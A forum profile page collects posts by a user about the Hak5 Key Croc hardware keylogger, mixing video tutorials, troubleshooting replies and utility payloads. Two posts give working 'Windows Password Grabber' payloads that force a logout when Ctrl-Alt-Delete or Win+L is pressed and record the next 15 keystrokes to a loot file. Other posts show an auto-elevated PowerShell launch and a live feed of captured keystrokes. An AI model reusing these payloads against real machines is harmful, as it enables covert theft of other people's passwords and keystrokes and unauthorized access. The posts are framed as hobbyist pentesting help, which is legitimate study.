Jump to content

RootJunky

Active Members
  • Posts

    31
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by RootJunky

  1. RootJunkys Video Guides I have created a bunch of video tutorials for the Key Croc. These video will hopefully help those of you on the forum that are having problems or just want to learn more about the devices. Hak5 official docs on the Croc are amazing but some times its hard to translate them to real world use. I hope you guys enjoy these videos. Introduction to the Key Croc Key Logger by Hak5 Key Croc key logger firmware restore and or Upgrade How to Factory Reset the Key Croc Key Logger by Hak5 Key Croc WiFi Setup and SSH shell access Key Croc intro to payloads and Nano editor Key Croc Payload Windows Password Grabber and Num Lock error. If there is something you guys would like to see covered in a video please comment below and I will see what I can do. Remember you can find the Official docs for the Key Croc here. https://docs.hak5.org/hc/en-us/categories/360003797793-Key-Croc Also the latest firmware here. https://downloads.hak5.org/croc RootJunky out.
  2. you got it right but I myself have not fully tested this feature. also what firmware version are you on.
  3. QUACK LOCK is a now bug and doesnt work at this time. WAIT_FOR_KEYBOARD_INACTIVITY 10 This command requires the interval at the end like above in seconds.
  4. well how's it going did that work? Also just a note the numlock has to be on on your keyboard for these and any payload to work correctly if you didnt already know.
  5. I know how to edit the config file as seen here https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/wifispot.txt that is not what i am asking. I want to know what these do. Framework helpers https://docs.hak5.org/hc/en-us/articles/360048190473-Helpful-Payload-Snippets Run GET_HELPERS on your keycroc.
  6. I just want to know what what they do. you can leave it up to me to figure out if i want to use them.
  7. MATCH back Q GUI r Q STRING powershell Q ENTER Q STRING Start-Process "powershell" -Verb RunAs Q ENTER Q DELAY 10000 Q KEYCODE 00,00,50 Q ENTER Q STRING \$Password = Read-Host -AsSecureString p4ssw0rd Here is my script that i added a couple changes to. I gave you the wrong escape before. It is the forward slash \ as you can see in the payload above. The \ escapes the $ which is run on the linux match as a bash command and now with the \ is ignored and types it to the powershell window instead. you will need the \ before every $ in your script. Q KEYCODE 00,00,50 is the left arrow button 🙂 auto admin permission.
  8. ok i think i see your problem. You have to remember that the Keycroc is a linux device and some commands are seen as bash on that device when typed with Q STRING in your powershell window. you should try putting those commands that mess up inside of "" or () also you can escape the linux bash with / in front of the part of the sting that messes up. good luck let me know if that works for you.
  9. please run my croc info script and give me the output. also can you link one of the scripts you are trying to run on the keycroc. Also what does your config.txt file look like. Having these would be very helpful for trouble shooting. I will try and help if i can.
  10. I would love to have some more explanation of that this commands all do. ENABLE_WIFI ENABLE_INTERFACE START_WLAN_DHCP CLEAR_WIFI_CONFIG CONFIG_PSK_WIFI CONFIG_OPEN_WIFI I see that CLEAR_WIFI_CONFIG will rm /etc/wpa_supplicant.conf but I cant seem to get any of the other commands in my payload to work like ENABLE_WIFI 'SSID' 'PASSWORD' will not edit the /etc/wpa_supplicant.conf or the config.txt file so i am not sure what these commands do. Maybe they are broken. Please help.
  11. This is a simple payload that is used to clear the log files stored in the KeyCroc. This gives you a clean slate to work with on a new machine and not have to look at all of the old key strokes. Great for development and testing. # Title: croc log clear # Description: crocclear = keycroc log files wipe # Author: Rootjunky # Version: 1.0 # Category: Key Croc # MATCH crocclear QUACK LOCK echo > /root/loot/croc_char.log echo > /root/loot/croc_raw.log echo > /root/loot/matches.log QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK UNLOCK LED FINISH Q DELAY 2000 LED OFF Developed by Rootjunky. croc-clear.txt
  12. totally agree this needs to be fixed in firmware version 1.4
  13. yes you nailed it when num lock is on i get 12 1 2 3 When num lock is off i get 12 Nothing as you can see but the enters.
  14. I just tested my Croc for number typing and it works just fine. Payload MATCH 12 QUACK ENTERQUACK STRING "1"QUACK ENTERQUACK STRING "2"QUACK ENTERQUACK STRING "3"QUACK ENTER typed 12 1 2 3 In fact when i typed twelve above it auto ran the Payload and typed the 1 2 3.
  15. something like this might work but if you mess it up you might loose your SSH connection to the croc. https://computingforgeeks.com/create-wi-fi-hotspot-on-ubuntu-debian-fedora-centos-arch/
  16. Yes fneagle that is a great idea but i dont know how to do that.
  17. For some reason QUACK GUI L wasn't working on my machine once control alt delete was matched but QUACK STRING GUI l works.
  18. Windows Password Grabber CAD This is a simple payload used to logout ones control alt delete is pressed on a windows PC, then it will capture the next 15 buttons pressed. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder. # Title: Windows Password Grabber # Description: When Control Alt Delete is pressed it will long out the current user and request a password that will be captured and stored in loot. # Author: RootJunky # Version: 1.0 # Category: Credentials # # MATCH \[CONTROL-ALT-DELETE\] LED ATTACK STAGE1 QUACK STRING "GUI l" SAVEKEYS /root/loot/password.log NEXT 15 QUACK DELAY 1000 LED OFF https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/windows-password-grabber-ctrl-alt-delete.txt
  19. Windows Password Grabber GUI L This is a simple payload used to capture the next 15 buttons pressed once someone presses Windows button and L to log them self out of a PC. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder. # Title: Windows Password Grabber GUI L # Description: When GUI L is pressed it will long out the current user and request a password that will be captured and stored in loot. # Author: RootJunky # Version: 1.0 # Category: Credentials # # MATCH \[GUI-l] LED ATTACK STAGE1 SAVEKEYS /root/loot/password-GUI-L.log NEXT 15 QUACK DELAY 1000 LED OFF Thanks RootJunky windows-password-grabber-gui-l.txt
  20. yes i made this actually. I left password the same and just changed the SSID works pretty good. Great look forward to the new firmware v1.3 # Title: ssid changer 1 # Description: Change the ssid stored in the config file # Author: Rootjunky # Version: 1.0 # Category: Key Croc # # MATCH changewifi QUACK LOCK QUACK ENTER QUACK STRING $(grep -rl "WIFI_SSID" /root/udisk/config.txt | xargs sed -i 's/WIFI_SSID 2WIRE111/WIFI_SSID KeyCroc/g') QUACK STRING "wifi ssid changed to KeyCroc" QUACK ENTER QUACK UNLOCK
  21. yes its a logitech K270 https://www.logitech.com/en-roeu/product/wireless-keyboard-k270 I have hardware to capture the keycodes but like i said i can not get them to work from the keycroc
  22. I did a little research into why my hot keys on my keyboard are not passing through the KeyCroc. Below are my keyboard scan codes that i captured with the number 1 for comparison. I am guessing that the reason these buttons are not working is because they are not listed in the language US.json. I would love some help trouble shooting this problem and adding these hot keys and others to the KeyCroc. I tried to make a payload that would QUACK KEYCODE 03,CD,00 for example and match it with MATCH 1 but this will not play/pause for me. Thoughts. radix: hexadecimal 03 CD 00 00 00 play pause radix: hexadecimal 03 E2 00 00 00 mute unmute radix: hexadecimal 03 EA 00 00 00 volume down radix: hexadecimal 03 E9 00 00 00 volume up radix: hexadecimal 03 23 02 00 00 home radix: hexadecimal 03 8A 01 00 00 mail radix: hexadecimal 04 01 power off / sleep screen radix: hexadecimal 03 92 01 00 00 cal radix: hexadecimal 00 00 1E 00 00 00 00 00 number 1
  23. Can you edit the config.txt file to be able to connect to multiple wifi SSID's? I would like to be able to connect to a local wifi network and and mobile hotspot, not at the same time but to whichever one is in range.
  24. CrocSSH By RootJunky Key Croc SSH login is really simple to use and makes it easy to ssh into your Key Croc with one simple command into a terminal ( crocssh ). Once you enter the command the script will erase the crocssh in the terminal and enter everything including the IP into the terminal along with the default password and get you logged into the device over ssh. First login requires you to accept the secure id but after that this script will log you in without any problems. suggestions welcome to improve this payload. Must type on target keyboard. Note: this payload is developed for Windows only and will not work on linux or OSX. Maybe Spywill can put together a Linux and mac OSX version for you guys. croc-ssh-payload.txt # Title: Key Croc ssh login # Description: Logs into key croc over ssh # Author: RootJunky # Version: 1.0 # Category: Key Croc # # MATCH crocssh QUACK LOCK QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK STRING "ssh root@" QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "hak5croc" QUACK ENTER QUACK ENTER QUACK UNLOCK Version 2.0 will open powershell and login to the keycroc along with bring you to a live key log that you can view as people type on the keyboard. Big thanks to Spywill for his help on this update. 🙂 # Title: Key Croc ssh login # Description: Logs into key croc over ssh # Author: RootJunky / Spywill # Version: 2.0 # Category: Key Croc # # MATCH crocssh Q LOCK Q GUI r sleep 1 Q STRING "powershell" Q ENTER sleep 2 Q STRING "ssh root@" sleep 1 Q STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) sleep 1 Q ENTER sleep 1 Q STRING "hak5croc" Q ENTER sleep 1 Q STRING "cd loot" Q ENTER sleep 1 # press control +c to exit Q STRING echo "press control + c to exit this live key log" Q ENTER Q ENTER Q STRING "tail -f croc_char.log" Q ENTER Q UNLOCK LED FINISH Big thanks to Hak5 for this awesome and fun Key Croc. Developed by RootJunky / Spywill croc-ssh-2.0.txt croc-ssh1.0.txt
  25. CrocInfo by RootJunky Croc info grabber is a simple script to be able to grab a bunch of info about your Key Croc with a simple command ( crocinfo ) This payload is best used for development when you only have one pc to develop and test on. This payload will return Key Croc Firmware, IP, DNS, User, Password, Hostname, SSH, and current Attack Mode. Place file in payloads folder and type crocinfo on target keyboard in a notepad to display crocinfo croc-info-payload.txt # Title: Key Croc Info Grabber # Description: Returns Info on the Key Croc # Author: RootJunky # Version: 1.0 # Category: Key Croc # # MATCH crocinfo QUACK LOCK QUACK ENTER QUACK ENTER QUACK STRING "CROC FIRMWARE: " QUACK STRING $(cat /root/udisk/version.txt) QUACK ENTER QUACK ENTER QUACK STRING "IP: " QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) QUACK ENTER QUACK STRING "DNS: " QUACK STRING $(sed -n -e 4p /etc/resolv.conf) QUACK ENTER QUACK STRING "DNS: " QUACK STRING $(sed -n -e 5p /etc/resolv.conf) QUACK ENTER QUACK ENTER QUACK STRING "USER: " QUACK STRING $(whoami) QUACK ENTER QUACK ENTER QUACK STRING "PASSWORD: " QUACK STRING "hak5croc" QUACK ENTER QUACK ENTER QUACK STRING "HOSTNAME: " QUACK STRING $(cat /proc/sys/kernel/hostname) QUACK ENTER QUACK ENTER QUACK STRING "SSH: " QUACK STRING "ssh root@" QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) QUACK ENTER QUACK ENTER QUACK STRING "MODE: " QUACK STRING $(cat /tmp/mode) QUACK ENTER QUACK ENTER QUACK UNLOCK #Default Settings #username: root #password: hak5croc #hostname: croc My Results crocinfo CROC FIRMWARE:1.2_475 IP:192.168.1.36 DNS:nameserver 1.1.1.1 DNS:nameserver 8.8.8.8 USER:root PASSWORD:hak5croc HOSTNAME:croc SSH:ssh root@192.168.1.36 MODE:HID VID_0X046D PID_0XC52B Big thanks to Hak5 for this awesome and fun Key Croc. Developed by RootJunky
×
×
  • Create New...